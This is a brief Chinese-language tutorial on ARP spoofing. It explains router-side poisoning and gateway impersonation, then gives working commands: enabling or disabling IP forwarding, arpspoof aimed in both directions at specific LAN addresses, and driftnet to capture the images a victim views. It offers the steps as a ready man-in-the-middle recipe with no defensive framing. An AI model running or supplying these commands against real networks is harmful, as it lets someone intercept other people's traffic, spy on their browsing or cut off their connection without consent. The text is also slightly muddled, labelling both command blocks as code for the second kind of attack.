arp欺騙分爲兩種,一種是對路由器的欺騙,一種是對內網pc的網關欺騙
第一種的原理是截獲網關數據。它通知路由器一系列錯誤的內網MAC地址,並按照一定的頻率不斷進行,使真實的地址信息無法通過更新保存在路由器中,結果路由器的所有數據只能發送給錯誤的MAC地址
第二種ARP欺騙的原理是——僞造網關。它的原理是建立假網關,讓被它欺騙的PC向假網關發數據,而不是通過正常的路由器途徑上網。
第二種欺騙的代碼有
echo 1 > /proc/sys/net/ipv4/ip_forward -- 1是指替被欺騙的pc像網關發送數據 改爲0則是不發送數據,被騙的pc就無法正常上網
arpspoof -i eth0 -t 172.28.15.41 172.28.15.254 ——欺騙172.28.15.41他要找的網關172.28.15.254是我的電腦上的網關,使得被騙的pc將數據發送到我的電腦
第二種欺騙代碼
driftnet 是指監聽被騙pc所瀏覽的圖片
arpspoof -i eth0 -t 172.28.15.254 172.28.15.41 欺騙網關 ,前一個爲網關,後一個爲被騙ip地址